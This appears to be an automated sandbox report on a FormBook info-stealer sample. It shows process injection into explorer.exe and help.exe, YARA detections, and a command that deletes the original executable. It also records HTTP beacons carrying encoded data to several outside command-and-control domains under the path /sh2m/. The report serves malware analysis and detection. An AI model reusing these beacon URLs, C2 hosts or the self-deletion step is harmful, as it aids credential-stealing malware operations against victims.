                                                                                                      Data Raw: 33 32 36 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 20 35 30 38 20 52 65 73 6f 75 72 63 65 20 4c 69 6d 69 74 20 49 73 20 52 65 61 63 68 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 27 2f 63 64 6e 2d 63 67 69 2f 62 6d 2f 63 76 2f 36 36 39 38 33 35 31 38 37 2f 61 70 69 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 52 65 73 6f 75 72 63 65 20 4c 69 6d 69 74 20 49 73 20 52 65 61 63 68 65 64 3c 2f 48 31 3e 0a 54 68 65 20 77 65 62 73 69 74 65 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 61 73 20 69 74 20 65 78 63 65 65 64 65 64 20 72 65 73 6f 75 72 63 65 20 6c 69 6d 69 74 2e 0a 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 5b 27 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 27 5d 3d 7b 72 3a 27 36 35 64 38 66 61 30 65 64 38 39 39 34 61 35 36 27 2c 6d 3a 27 64 65 33 33 62 36 37 65 34 64 34 33 35 35 37 62 61 64 36 33 39 34 38 35 34 36 32 66 61 39 37 66 32 63 35 39 38 37 38 38 2d 31 36 32 33 33 39 34 39 37 37 2d 31 38 30 30 2d 41 66 54 7a 6a 78 50 37 4a 69 44 34 33 44 5a 71 6f 6f 52 4c 72 6c 55 35 48 77 59
                                                                                                      Data Ascii: 326<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE> 508 Resource Limit Is Reached</TITLE><script async src='/cdn-cgi/bm/cv/669835187/api.js'></script></HEAD><BODY><H1>Resource Limit Is Reached</H1>The website is temporarily unable to service your request as it exceeded resource limit.Please try again later.<script type="text/javascript">(function(){window['__CF$cv$params']={r:'65d8fa0ed8994a56',m:'de33b67e4d43557bad639485462fa97f2c598788-1623394977-1800-AfTzjxP7JiD43DZqooRLrlU5HwY


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      4192.168.2.3497393.143.65.21480C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Jun 11, 2021 09:03:07.889676094 CEST4580OUTGET /sh2m/?i0=c9aUCvLa9Ql2a6xFKe5xJWdXulTfAnmJmW0relGKzVi+CMwVFA49Zy8Fshmf8yObHaZC&4huxZr=02MtK8MPsR3L HTTP/1.1
                                                                                                      Host: www.insurancedowntown.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      Jun 11, 2021 09:03:08.030723095 CEST4580INHTTP/1.1 404 Not Found
                                                                                                      Date: Fri, 11 Jun 2021 07:03:07 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 153
                                                                                                      Connection: close
                                                                                                      Server: nginx/1.16.1
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      5192.168.2.3497423.34.12.4180C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Jun 11, 2021 09:03:13.687930107 CEST4657OUTGET /sh2m/?i0=UiVwUNrNLQfwtohPmVYH70t5lUixURpqlrLqHTUDsyREBVD/9Tpqi3FDGPs9lJ3zNa3b&4huxZr=02MtK8MPsR3L HTTP/1.1
                                                                                                      Host: www.ezonkorea.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      Jun 11, 2021 09:03:13.974311113 CEST4659INHTTP/1.1 404 Not Found
                                                                                                      Date: Fri, 11 Jun 2021 07:03:13 GMT
                                                                                                      Server: Apache
                                                                                                      X-Powered-By: PHP/5.6.36
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Cache-Control: No-Cache
                                                                                                      Connection: close
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Data Raw: 31 66 62 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 72 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 33 36 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e ed 86 b5 ed 95 a9 eb b3 b4 ed 97 98 20 eb b9 84 ea b5 90 ea b2 ac ec a0 81 ec 82 ac ec 9d b4 ed 8a b8 3c 2f 74 69 74 6c 65 3e 0a 09 09 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 31 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 51 75 65 72 79 2e 73 65 72 69 61 6c 69 7a 65 4f 62 6a 65 63 74 2f 32 2e 30 2e 33 2f 6a 71 75 65 72 79 2e 73 65 72 69 61 6c 69 7a 65 4f 62 6a 65 63 74 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 73 6f 6e 33 2f 33 2e 33 2e 32 2f 6a 73 6f 6e 33 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0a 20 20 20 20 20 20 24 66 6f 72 6d 20 3d 20 24 28 27 2e 70 75 72 65 2d 66 6f 72 6d 27 29 3b 0a 20 20 20 20 20 20 24 66 6f 72 6d 2e 73 75 62 6d 69 74 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 24 74 68 69 73 20 3d 20 24 28 74 68 69 73 29 3b 0a 0a 09 09 76 61 72 20 66 20 3d 20 74 68 69 73 3b 0a 0a 09 09 69 66 20 28 66 2e 61 67 72 65 65 2e 63 68 65 63 6b 65 64 20 3d 3d 20 66 61 6c 73 65 29 0a 09 09 09 7b 0a 09 09 09 09 61 6c 65 72 74 28 27 ea b0 9c ec 9d b8 ec a0 95 eb b3 b4 ec b7 a8 ea b8 89 eb b0 a9 ec b9 a8 ec 97 90 20 eb 8f 99 ec 9d 98 ed 95 b4 20 ec a3 bc ec 84 b8 ec 9a 94 2e 27 29 3b 0a 09 09 09 09 66 2e 61 67 72 65 65 2e 66 6f 63 75 73 28 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 09 7d 0a 0a 09 09 09 0a 09 09 09 09 69 66 20 28 66 2e 63 75 73 74 6f 6d 65 72 5f 6e 61 6d 65 2e 76 61 6c 75 65 20 3d 3d 20 22 22 29 0a 09 09 09 7b 0a 09 09 09 09 61 6c 65 72 74 28 27 ec 9d b4 eb a6 84 ec 9d 84 20 ec 9e 85 eb a0 a5 ed 95 b4 20 ec a3 bc ec 84 b8 ec 9a 94 2e 27 29 3b 0a 09 09 09 09 66 2e 63 75 73 74 6f 6d 65 72 5f 6e 61 6d 65 2e 66 6f 63 75 73 28 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 09 7d 0a 0a 20 20 20 20 09 09 09 69 66 20 28 66 2e 63 75 73 74 6f 6d 65 72 5f 62 69 72 74 68 2e 76 61 6c 75 65 20 3d 3d 20 22 22 29 0a 09 09 09 7b 0a 09 09 09 09 61 6c 65 72 74 28 27 ec 83 9d eb 85 84 ec 9b 94 ec 9d bc ec 9d 84 20 ec 9e 85 eb a0 a5 ed 95
                                                                                                      Data Ascii: 1fb4<!doctype html><html lang="kr"><head><meta name="viewport" content="width=360, user-scalable=no"><meta charset="UTF-8"><meta name="format-detection" content="telephone=no" /><title> </title><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jQuery.serializeObject/2.0.3/jquery.serializeObject.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/json3/3.3.2/json3.min.js"></script> <script type="text/javascript"> jQuery(function($) { $form = $('.pure-form'); $form.submit(function(e) { var $this = $(this);var f = this;if (f.agree.checked == false){alert(' .');f.agree.focus();return false;}if (f.customer_name.value == ""){alert(' .');f.customer_name.focus();return false;} if (f.customer_birth.value == ""){alert('


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      6192.168.2.349744107.180.57.11180C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Jun 11, 2021 09:03:19.407633066 CEST4684OUTGET /sh2m/?i0=e+6U2v/464/49Vrt/4yGVwpDKMjmMUzpCV508o5/z2Kz7+x90JHivdh29zvGxsTtrzAO&4huxZr=02MtK8MPsR3L HTTP/1.1
                                                                                                      Host: www.dndemystified.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      Jun 11, 2021 09:03:19.565264940 CEST4685INHTTP/1.1 404 Not Found
                                                                                                      Date: Fri, 11 Jun 2021 07:03:19 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 315
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      7192.168.2.34975045.195.169.19780C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Jun 11, 2021 09:03:24.978941917 CEST4940OUTGET /sh2m/?i0=uHvpiI6aXo2y2Po+6svR0qIfr0jRx6IK9412etvelJearRBAFXnPloN9l4KAKLF+tazG&4huxZr=02MtK8MPsR3L HTTP/1.1
                                                                                                      Host: www.meganfantastic.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      Jun 11, 2021 09:03:25.300106049 CEST5009INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 11 Jun 2021 07:03:25 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 479
                                                                                                      Connection: close
                                                                                                      ETag: "6080f05e-1df"
                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 09 62 6f 64 79 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 7d 0a 09 68 33 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 e5 9c a8 21 3c 2f 68 33 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>


                                                                                                      Code Manipulations

                                                                                                      Statistics

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      Analysis Process: KY4cmAI0jU.exe PID: 2128 Parent PID: 5892

                                                                                                      General

                                                                                                      Start time:09:01:30
                                                                                                      Start date:11/06/2021
                                                                                                      Path:C:\Users\user\Desktop\KY4cmAI0jU.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\Desktop\KY4cmAI0jU.exe'
                                                                                                      Imagebase:0x400000
                                                                                                      File size:224710 bytes
                                                                                                      MD5 hash:8C35AC8D43F7E59105902FA16114144E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      Reputation:low

                                                                                                      Analysis Process: KY4cmAI0jU.exe PID: 1632 Parent PID: 2128

                                                                                                      General

                                                                                                      Start time:09:01:30
                                                                                                      Start date:11/06/2021
                                                                                                      Path:C:\Users\user\Desktop\KY4cmAI0jU.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:'C:\Users\user\Desktop\KY4cmAI0jU.exe'
                                                                                                      Imagebase:0x400000
                                                                                                      File size:224710 bytes
                                                                                                      MD5 hash:8C35AC8D43F7E59105902FA16114144E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      Reputation:low

                                                                                                      Analysis Process: explorer.exe PID: 3388 Parent PID: 1632

                                                                                                      General

                                                                                                      Start time:09:01:35
                                                                                                      Start date:11/06/2021
                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:
                                                                                                      Imagebase:0x7ff714890000
                                                                                                      File size:3933184 bytes
                                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Analysis Process: help.exe PID: 5448 Parent PID: 3388

                                                                                                      General

                                                                                                      Start time:09:01:53
                                                                                                      Start date:11/06/2021
                                                                                                      Path:C:\Windows\SysWOW64\help.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\help.exe
                                                                                                      Imagebase:0xb80000
                                                                                                      File size:10240 bytes
                                                                                                      MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      Reputation:moderate

                                                                                                      Analysis Process: cmd.exe PID: 5380 Parent PID: 5448

                                                                                                      General

                                                                                                      Start time:09:01:56
                                                                                                      Start date:11/06/2021
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:/c del 'C:\Users\user\Desktop\KY4cmAI0jU.exe'
                                                                                                      Imagebase:0x380000
                                                                                                      File size:232960 bytes
                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Analysis Process: conhost.exe PID: 6060 Parent PID: 5380

                                                                                                      General

                                                                                                      Start time:09:01:57
                                                                                                      Start date:11/06/2021
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6b2800000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Disassembly

                                                                                                      Code Analysis

                                                                                                      Reset < >